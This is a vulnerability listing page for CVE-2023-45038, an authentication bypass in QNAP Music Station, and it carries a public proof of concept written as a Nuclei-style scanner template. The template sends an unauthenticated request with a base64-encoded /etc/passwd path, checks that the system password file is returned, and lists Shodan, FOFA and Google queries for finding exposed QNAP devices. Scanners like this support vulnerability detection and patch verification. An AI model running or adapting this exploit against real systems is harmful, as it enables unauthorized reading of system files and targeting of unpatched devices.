CVE-2023-45038: QNAP Music Station < 5.4.0 - Authentication Bypass

Date: 2025-12-12 | Affected software: QNAP Music Station | PoC: Public

Vulnerability Description

An improper authentication vulnerability has been reported to affect Music Station. If exploited, the vulnerability could allow users to compromise the security of the system via a network. We have already fixed the vulnerability in the following version: Music Station 5.4.0 and later.

PoC Code [Public]

id: CVE-2023-45038

info:
  name: QNAP Music Station < 5.4.0 - Authentication Bypass
  author: daffainfo
  severity: medium
  description: |
    An improper authentication vulnerability has been reported to affect Music Station. If exploited, the vulnerability could allow users to compromise the security of the system via a network. We have already fixed the vulnerability in the following version: Music Station 5.4.0 and later
  reference:
    - https://www.qnap.com/en/security-advisory/qsa-24-25
    - https://karzemrok.com/qnap-qsa-24-25
    - https://nvd.nist.gov/vuln/detail/CVE-2023-45038
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N
    cvss-score: 4.3
    cve-id: CVE-2023-45038
    epss-score: 0.06486
    epss-percentile: 0.9073
    cwe-id: CWE-287
    cpe: cpe:2.3:a:qnap:music_station:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: qnap
    product: music_station
    shodan-query: http.title:"qnap"
    fofa-query: title="qnap"
    google-query: intitle:"qnap"
  tags: cve,cve2023,qnap,music_station,auth-bypass,vkev

http:
  - raw:
      - |
        POST /musicstation/api/as_get_file_api.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        ssid=dummy&songid=1&tt=ts&f=L2V0Yy9wYXNzd2Q=

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "admin:.*:0:0:"

      - type: word
        part: content_disposition
        words:
          - "filename='passwd'"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100c958eda877c22358a527406dda8246244bc06c303365ad3058ce054be8d2133a022100e56bee25b026eaf86e42f217875a1336e012ff7a449b9315e7c374fdcff1a66e:922c64590222798bb761d5b6d8e72950
